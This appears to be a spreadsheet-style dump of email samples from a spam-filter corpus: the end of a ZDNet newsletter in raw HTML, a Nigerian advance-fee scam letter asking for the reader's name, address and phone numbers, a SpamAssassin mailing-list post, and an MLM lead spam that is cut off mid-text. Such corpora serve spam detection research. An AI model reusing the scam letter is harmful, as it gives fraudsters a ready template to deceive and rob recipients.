 " height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D00-4FQlI9Q=
 kZ2_8PB9bgi4cHr7W6TiR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Find out the top 10 Web services security requirements at Tech Update.&lt;/b&gt;&lt;=
 /font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=
 =3D"1" height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D15-mYP_IGc=
 k22zinwfAV-hDEc2lRbPR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;=
 /b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" wid=
 th=3D"1" height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D2a-CNuWIrI=
 PMgp4sWBabman8WccrYnR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Check out thousands of IT job listings in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" h=
 eight=3D"6"&gt;&lt;br&gt;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&gt;MON JUL 15,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ck?q=3D3f-4sAEIqMWSOfOZy1Hcoh57BymNzeR" &gt;&lt;b&gt;Dear Steve Jobs: At Macworld, s=
 how me this...&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/=
 clear.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                 I'm headed to NYC for Macworld Expo. Steve Jobs usually mak=
 es big announcements at these shows--last time around it was those cool new=
  iMacs. I don't know what he's got up his sleeve this time, but here's what=
  I'm hoping for.&lt;p&gt;
         =20
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D55-TAHaIKJ=
 8NI9Nyl4qm86ccJ_2d2ZR" &gt;&lt;b&gt;NOTE: Why we're changing our publishing schedule=
 &lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage=
 /b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D6a-z_30IeW=
 iBSF69cHzceCGFySNP8dR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: From Apple's Jaguar to E=
 d McMahon&lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/=
 frontpage/b.gif"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href=3D"http://clickthru.online.com/Click?q=3D7f-bn6KIIP6RGjvuSo=
 9IO3JewkhBpuR" &gt;Tech bids for security money... Fridge viruses... USA Today=
  hacked &lt;/a&gt;&lt;p&gt;
         =20
        =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D94-rOVNQaI7VZVT6HI=
 J5elUjfr5JQyR" &gt;The many ways YOU'D change Microsoft Office &lt;/a&gt;&lt;p&gt;
         =20
        =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3Da9-IlbqQpUxnePiQlI=
 z2JQZv91zVMlR" &gt;Wanna combo PDA/cell phone? Here's what to look for&lt;/a&gt;&lt;p&gt;
                =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3Dbe-B7ixQCpTpr7DXfx=
 bnY9y52GfwH4R" &gt;How to defrag your hard drive--and speed up your PC&lt;/a&gt;&lt;p&gt;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cellspacing=
 =3D"0" border=3D"0" bgcolor=3D"#ffffff"&gt; &lt;tr bgcolor=3D"#999999"&gt;&lt;td colspa=
 n=3D"7" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ffffff=
 " size=3D"-2"&gt;y&lt;b&gt;Crucial Clicks: More from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;=
  &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/gra=
 phics/anchordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt; &lt;td rowspan=3D=
 "3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" h=
 eight=3D1 width=3D5&gt;&lt;/td&gt; &lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" height=3D5 width=3D1&gt;&lt;/td&gt; &lt;td rowsp=
 an=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.g=
 if" height=3D1 width=3D5&gt;&lt;/td&gt; &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img s=
 rc=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 =
 width=3D1&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr valign=3D"top"&gt; &lt;td width=3D"100%"&gt;       &lt;table =
 width=3D"100%"  cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;        &lt;t=
 r&gt;&lt;td colspan=3D"3"&gt;&lt;font face=3D"verdana, geneva" color=3D"#333333" size=
 =3D"-2"&gt;&lt;b&gt;PDAS&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/a=
 nchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;        &lt;tr=
  valign=3D"top"&gt;       &lt;td width=3D"85"&gt;&lt;a href=3D"http://clickthru.online.=
 com/Click?q=3Dd3-GZHkQJPaYHkih6jK74p01K7fy3rR" &gt;&lt;img src=3D"http://www.zdne=
 t.com/products/graphics/060502_Palmapps.jpg" width=3D"85" height=3D"110" bo=
 rder=3D"0" alt=3D"" /&gt;&lt;/a&gt;&lt;/td&gt;   &lt;td width=3D"5"&gt;&lt;img src=3D"http://www.zd=
 net.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;    =
     &lt;td width=3D"100%"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3De9-gdzpQxVzw920P86TRnU3P83P5XlR" =
 style=3D"text-decoration:none"&gt;&lt;b&gt;An industry first&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;ZDNet revi=
 ewers take a look at Toshiba's e740, the first PDA with Intel's new XScale =
 processor and integrated Wi-Fi connectivity.&lt;/font&gt;&lt;/td&gt;        &lt;/tr&gt;   &lt;tr=
 &gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fro=
 ntpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;img src=3D"http://techupdate.zdne=
 t.com/techupdate/i/arrow_blue.gif" width=3D"8" height=3D"10" border=3D"0" a=
 lt=3D"" /&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=3D"http://cli=
 ckthru.online.com/Click?q=3Dfe-xkIgQwgwkMs4UcSeE4rbg6amtI4R" style=3D"text-=
 decoration:none"&gt;Read our Full Review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;   &lt;/table&gt; &lt;/td&gt;=
  &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" =
 height=3D1 width=3D5&gt;&lt;/td&gt; &lt;td width=3D"180"&gt;  &lt;table cellpadding=3D"0" cel=
 lspacing=3D"0" width=3D"180" border=3D"0" bgcolor=3D"#eeeeee"&gt;        &lt;tr b=
 gcolor=3D"#999999"&gt;&lt;td colspan=3D"3" height=3D"15"&gt;&lt;font face=3D"ms sans se=
 rif, geneva" color=3D"#ffffff" size=3D"-2"&gt;yMost Popular Products&lt;/font&gt;&lt;/t=
 d&gt;&lt;/tr&gt;  &lt;tr&gt;    &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/f=
 rontpage/b.gif" width=3D"10" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;    =
      &lt;td&gt;&lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;img src=3D"http:=
 //www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"=
 5" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;    &lt;b&gt;Handhelds&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"http=
 ://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D=
 "7" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;       &lt;b&gt;1&lt;/b&gt;. &lt;a href=3D"http://clickt=
 hru.online.com/Click?q=3D13-NxSZI3XW8SiY3FwssDLfzpHOCerR" style=3D"text-dec=
 oration:none"&gt;Toshiba Pocket PC e310&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.=
 com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" =
 border=3D"0" /&gt;&lt;br /&gt;       &lt;b&gt;2&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.co=
 m/Click?q=3D28-A2wXIRd4w3vWlFlEL2t1VlTK8yiR" style=3D"text-decoration:none"=
 &gt;Toshiba Pocket PC e740&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/=
 anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" =
 /&gt;&lt;br /&gt;      &lt;b&gt;3&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=3D3d=
 -oi9NIbz4YX6n4S9vwlGWUTnaNtPR" style=3D"text-decoration:none"&gt;Palm m515&lt;/a&gt;=
 &lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif"=
  width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;    &lt;b&gt;4&lt;/b&gt;. &lt;a hr=
 ef=3D"http://clickthru.online.com/Click?q=3D52-LUXoIrJtdR2WZMcMWz8AtIQwjjnR=
 " style=3D"text-decoration:none"&gt;Palm Vx&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zd=
 net.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=
 =3D"" border=3D"0" /&gt;&lt;br /&gt;      &lt;b&gt;5&lt;/b&gt;. &lt;a href=3D"http://clickthru.onli=
 ne.com/Click?q=3D67-PnDkIOEDqntDs-FWhKPAKa1CPIuR" style=3D"text-decoration:=
 none"&gt;Compaq iPaq H3835&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/=
 anchordesk/frontpage/b.gif" width=3D"1" height=3D"6" alt=3D"" border=3D"0" =
 /&gt;&lt;br /&gt;    &lt;img src=3D"http://techupdate.zdnet.com/techupdate/i/arrow_blue=
 .gif" width=3D"8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;b&gt;&lt;a href=3D"http:=
 //clickthru.online.com/Click?q=3D7c-7NCZIZWccN3HBUxfLHDx1984BOsR" style=3D"=
 text-decoration:none"&gt;More popular PDAs&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;    &lt;img src=3D"http:/=
 /www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"1=
 0" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;    &lt;/font&gt;&lt;/td&gt;    &lt;td&gt;&lt;img src=3D"http:/=
 /www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"10" height=3D"=
 1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;/tr&gt;   &lt;/table&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr v=
 align=3D"top"&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/a=
 nchordesk/frontpage/b.gif" height=3D5 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td colspan=
 =3D"7" bgcolor=3D"#999999"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchor=
 desk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt; &lt;/table&gt; &lt;!-- /### --=
 &gt; &lt;table cellpadding=3D10 border=3D0 cellspacing=3D0&gt;
 &lt;tr&gt;&lt;td&gt;=20
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D92-ubRVQTzT5IB3xtHzeFOPq1FsnynR"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://clickthru.online.com/Click?q=3Da7-fR_2Q8BwVDMi5xHLF5vLk7KCgFeR" &gt;&lt;b&gt;Tech=
  bids for security money... Fridge viruses... USA Today hacked&lt;/b&gt;&lt;/a&gt;&lt;br&gt;T=
 ech companies long for a piece of the billion-dollar government IT budget. =
 Plus: Computer viruses may infect your fridge one day soon. And USA Today's=
  Web site is the latest victim of a hack attack. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
        =20
 &lt;!--------/AD-----------------------------------&gt;
 &lt;br&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3Dbc-zkPJQ6BdHnB-VFXmobF8XEDxwcyR" &gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/header2_your.gif" width=3D"150" height=3D"2=
 0" border=3D"0" vspace=3D10 alt=3D"News Analysis"&gt;&lt;/a&gt;&lt;br&gt; &lt;table cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID MORGENSTERN&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/445.gif" alt=3D"DAVID MORGENSTERN" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"5"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3Dd1-ulOzQpErJC7fidx10-kl0aSxkZlR" &gt;&lt;b&gt;The =
 many ways YOU'D change Microsoft Office&lt;/b&gt;&lt;/a&gt;&lt;br&gt;David Coursey recently p=
 resented his top ten wishes for how Microsoft could improve the next versio=
 n of Office. Turns out you have your own suggestions for making the office =
 suite better, too. David presents your ideas. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
         =20
        =20
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3De6-qG8rQwyqDDYWMlFXGugH6NQYvU4R" &gt;&lt;b&gt;Quic=
 kPoll results: Which office suite do you use?&lt;/b&gt; &lt;/a&gt;&lt;/font&gt;&lt;p&gt;
        =20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e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID BERLIND&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/390.gif" alt=3D"DAVID BERLIND" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dfb-aWErQkg=
 qrGUnXAToFokcTbTDoVrR" &gt;&lt;b&gt;Wanna combo PDA/cell phone? Here's what to look =
 for&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clea=
 r.gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 With all the new gadgets out there merging PDAs with cell p=
 hones, choosing the right device is harder than ever. Before you lay down y=
 our cash, let David explain which features really matter, from Bluetooth to=
  thumbboards.&lt;/font&gt;&lt;/td&gt;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href=3D"http://clickthru.online.com/Click?q=3D11-l8riI2-=
 4ELsHpx5X3VynhNBuCqlR" &gt;&lt;b&gt;How to defrag your hard drive--and speed up your=
  PC&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clea=
 r.gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Looking for a quick way to rev up your sluggish system? Try=
  defragmenting your hard drive. Since the Windows defrag tool is less than =
 ideal, Preston shows you three downloads that do a better job of it.&lt;/font&gt;=
 &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;  =20
 &lt;p&gt;
 &lt;hr size=3D1 width=3D"80% noshade align=3D"left"&gt;
 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;div align=3Dcenter&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D26-KqPVIiMHolyBsSyBBBkqU8n=
 iQ74R" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com=
 /Click?q=3D3b-XhxVINdHnv20LoZFPcZsjpRp-LrR"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rl_login?email=3Dqqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=3Dzdnet'&gt;free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href=3D'http://clickthru.online.com/Click?q=3D50-M_UBzd0=
 5wuaY3lC9S5rwjwQuI7T5uRRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dlegit-=
 list-zdnet@spamassassin.taint.org&amp;brand=3Dzdnet'&gt;Manage=20
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online=
 .com/Click?q=3D65-K82zIDPtIgrQCKtD70VOf0m8P9ZR" &gt;FAQ&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D7a-EE_AIPBjU=
 rvH2Y-hU6coezkBZXdR"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href=3D"http://clickthru.online.com/Click?q=3D8f-OOYvQ8KK=
 wWVqRowXvsg9tyQFWveR" &gt;&lt;img src=3D"http://www.zdnet.com/graphics/newsletter=
 s/gl_ft.gif" width=3D75 height=3D43 border=3D0 alt=3D"ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D525&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#fffff=
 f"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Da5-DyaHQ7ZTa_hHrGvsIC1b=
 2OB8OEPR" style=3D"color: #fff"&gt;Home&lt;/a&gt; |&lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3Dba-m-45QXpKAW8cckTxhOmI_uIUEknR" style=3D"color: #fff"&gt;eBus=
 iness&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3Dcf-ebM-QLw2HwY=
 0dhWJaylIO7r3fxeR" style=3D"color: #fff"&gt;Security&lt;/a&gt; | &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3De4-ABYFQVkWGjER585I81u0PT_Qv1yR" style=3D"col=
 or: #fff"&gt;Networking&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3Df9-mtKTQxOWPQ43Hb2SM_svdGheo-lR" style=3D"color: #fff"&gt;Applications&lt;/a&gt; =
 | &lt;a href=3D"http://clickthru.online.com/Click?q=3D0e--eOTIiQzHxFUGBL4r8dJx=
 98lbK4R" style=3D"color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3D23-sFcGINM8KMs305CiAv2Y9ZZvQKrR" style=3D"color: #fff"=
 &gt;Hardware&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D38-bLkmIRM=
 2PYhjcY_nhJiSUxuD-DiR"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NL=3De501-01&amp;ISSUE=3D2002-07-15" height=3D1 width=3D1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;=
 tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, sans-serif size=3D2&gt;   =
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;=20
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3Ddf-1=
 kzh-1Elx2t1PRqyYW5XJUS6xdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Funds Investment
</t>
  </si>
  <si>
    <t xml:space="preserve">This message is in MIME format. Since your mail reader does not understand
 this format, some or all of this message may not be legible.
 --=_NextPart_Caramail_0054031032174770_ID
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 SENIOR ADVOCATE OF NIGERIA 
 BARR. WILLIAMS FALANA (SAN)
 Dear Sir, 
 I am Barrister Williams Falana a member of Nigeria Bar 
 Association (NBA).Your contact reached me through the World 
 Business Encyclopaedia.Hence,I made up my mind to introduce 
 this business to you in confidence for the mutual benefit 
 of both of us. 
 The sum of USD48M (Forty eight Million United States) was 
 lodged into a security company here in the Country by the 
 late Head of State (GEN.SANI ABACHA) for safe-keeping. This 
 money was lodged in security vaults / boxes and labelled as
 personal belongings and as such the security company does 
 not know the true content of the boxes.This money was 
 originally meant to be used for his political campaign. 
 Because I was his family Attorney as such he confided in me 
 with the relevant document papers relating to this deposit 
 before he died of cardiac arrest.
 As a matter of fact we have concluded all arrangement with 
 an offshore Security Company to move this money as a 
 consignment through diplomatic means to their offshore 
 affiliated office where you will be required to put claim 
 to the consignment as the bonafide beneficiary of the 
 consignment. You should know that this business is safety 
 and 100% risk-free as it does not involve drug money or 
 Terrorist fund.
 If you are interested to carry out this transaction with 
 me, 20% will be for you for your assistance, 5% for general 
 expenses, and 75% for us.
 You are required to send by e-mail immediately your Full 
 name and Address, which I will use to draft an agreement 
 that will guide and protect both of us in this transaction 
 also which will be used to effect the change of ownership 
 of the consignment to your name as the beneficiary of the 
 consignment.
 Also send me your Telephone and Fax numbers for easy 
 communication
 Once you notify me your willingness by sending the above 
 requirement.This transaction will be concluded within 7 
 (seven) working days.
 I will be waiting for your urgent reply.You can reach me on 
 my Cell Telephone No: 234-80- 33055024 or my alternative E-
 mail: williamsfalana@caramail.com 
 Best regards, 
 Barrister Williams Falana {SAN} 
 ______________________________________________________
 Bo=EEte aux lettres - Caramail - http://www.caramail.com
 --=_NextPart_Caramail_0054031032174770_ID--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Badly Formatted Spam Report in HTML spam
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 11 Sep 2002, Vince Puzzella wrote:
 &gt; Ever since I set defang_mime 0 all spam that contains HTML has a badly
 &gt; formatted report.  I think/realize it's because the report should be in
 &gt; HTML.  Is there anyway to get Spamassassin to add an HTML report in
 &gt; cases where it is required (defang_mime 0)?
 Funny, I was in the middle of composing the same message when I saw yours.
 It would be nice if it sees a header like:
 Content-type: text/html; charset=iso-8859-1
 and defang_mime is 0, it could wrap the report with &lt;pre&gt;&lt;/pre&gt; for ease
 of reading?
 And the same sort of problem seems to occur with base64 encoded messages.
 The report is placed inside of the mime boundary:
 ------=_NextPart_000_00B7_31E64A2B.B8441E37
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 Should this not go above (probably in it's own mime section,) to make sure
 that the attachments don't get destroyed?
 Ian
 -------------------------------------------
 Ian White
 email: iwhite@victoria.tc.ca
 -------------------------------------------------------
 In remembrance
 www.osdn.com/911/
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cost-Effective MLM/Bizop Phone-Screened Leads
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 Hello, &lt;br&gt;&lt;br&gt;
 &lt;div align="center"&gt;&lt;font size=5&gt;&lt;u&gt;Premium Phone Qualified &lt;br&gt;
 Business Opportunity Leads&lt;br&gt;&lt;br&gt;
 &lt;/u&gt;&lt;/font&gt;&lt;font size=4&gt;If you're spending money marketing a Business &lt;b&gt;Opportunity &lt;/b&gt;or &lt;b&gt;MLM&lt;/b&gt;,&lt;br&gt;
 you will &lt;b&gt;&lt;i&gt;&lt;u&gt;definitely&lt;/u&gt; &lt;/i&gt;&lt;/b&gt;be interested in &lt;br&gt;
 what we have to offer you. &lt;br&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;/div&gt;
 You're &lt;i&gt;&lt;u&gt;tired&lt;/u&gt; &lt;/i&gt;of blindly spending money for leads and not having &lt;br&gt;
 any idea what kind of response you'll get from it.&amp;nbsp; Sometimes&lt;br&gt;
 calling 100 people &lt;b&gt;without one single signup!&lt;/b&gt;&amp;nbsp; Sometimes &lt;br&gt;
 talking to people who have been &lt;b&gt;bombarded&lt;/b&gt; by bizop pitches&lt;br&gt;
 to the point of them &lt;u&gt;hanging up&lt;/u&gt; when you call!&amp;nbsp; (Leads oversold)&lt;br&gt;&lt;br&gt;
 We're here to help! &lt;br&gt;&lt;br&gt;
 We'll get you &lt;i&gt;&lt;u&gt;qualified leads for your MLM or Business Opportunity.&lt;/u&gt;&lt;/i&gt; &lt;br&gt;&lt;br&gt;
 &lt;b&gt;Period.&lt;/b&gt; &lt;br&gt;&lt;br&gt;
 No qualifiers, no conditions, no nonsense. &lt;br&gt;&lt;br&gt;
 We'll do it &lt;i&gt;&lt;u&gt;quickly,&lt;/u&gt;&lt;/i&gt; and &lt;i&gt;&lt;u&gt;professionally&lt;/u&gt;&lt;/i&gt;. &lt;br&gt;&lt;br&gt;
 &lt;i&gt;And we won't ask you for a &lt;u&gt;single dime&lt;/u&gt; without &lt;b&gt;guaranteeing&lt;/b&gt; &lt;u&gt;results&lt;/u&gt;!&lt;br&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/i&gt;&lt;b&gt;&lt;u&gt;Here's How We Generate Our Leads...&lt;br&gt;&lt;br&gt;
 &lt;/u&gt;&lt;/b&gt;-&lt;b&gt; All of these Leads are generated IN-HOUSE!&lt;br&gt;&lt;br&gt;
 &lt;/b&gt;- One source we use for Lead-generation is a &lt;b&gt;Business Opportunity&lt;br&gt;
 Seeker Lead List&lt;/b&gt; of people who have requested info. about making &lt;br&gt;
 extra income from home by either filling out an online questionnaire,&lt;br&gt;
 or responding to an email ad, classified ad, postcard, etc.,.&lt;br&gt;&lt;br&gt;
 - The other source we use is an Automated Call Center.&lt;br&gt;
 We have computerized software that dials up LOCAL residents,&lt;br&gt;
 plays a recorded message asking them if they're interested in&lt;br&gt;
 making money from home.&amp;nbsp; If they are, the system records their&lt;br&gt;
 name and phone number for us to CALL BACK AND QUALIFY.&lt;br&gt;&lt;br&gt;
 - The prospects that come from either of the above sources are then&lt;br&gt;
 &lt;b&gt;PHONE INTERVIEWED BY US, here in our offices &lt;/b&gt;and the following &lt;br&gt;
 info. is asked (after confirming their desire to find an opportunity):&lt;br&gt;&lt;br&gt;
 &lt;b&gt;Name:&lt;br&gt;
 Email:&lt;br&gt;
 Phone:&lt;br&gt;
 Best time to call:&lt;br&gt;
 State:&lt;br&gt;
 Reason they want to work from home!:&lt;br&gt;
 How much they want to make per month:&lt;br&gt;
 How much time they can commit per week:&lt;br&gt;
 How much money they have available for startup:&lt;br&gt;
 If they see an opportunity, how soon they would get started:&lt;br&gt;&lt;br&gt;
 We'll close by telling them they'll be contacted by no&lt;br&gt;
 more than 3 or 4 people regarding different opportunities.&lt;br&gt;&lt;br&gt;
 &lt;/b&gt;- Then the Leads are submitted to a website we set up for you, &lt;br&gt;
 from which the results are then forwarded to you by email.&lt;br&gt;&lt;br&gt;
 - This way, &lt;b&gt;you get the Leads fresh, and in *real-time*&lt;/b&gt; &lt;br&gt;
 (only minutes old).&amp;nbsp; Never more than 24 hours old.&amp;nbsp; Guaranteed!&lt;br&gt;&lt;br&gt;
 - We &lt;b&gt;GUARANTEE&lt;/b&gt; that you'll receive &lt;u&gt;AT LEAST&lt;/u&gt; a valid &lt;u&gt;Name&lt;/u&gt;, &lt;br&gt;
 &lt;u&gt;Phone Number&lt;/u&gt; and the &lt;u&gt;Time-Date Stamp&lt;/u&gt; corresponding to when&lt;br&gt;
 the Lead was generated!&amp;nbsp; However, almost ALL leads will have&lt;br&gt;
 ALL of the information asked above.&lt;br&gt;&lt;br&gt;
 &lt;br&gt;
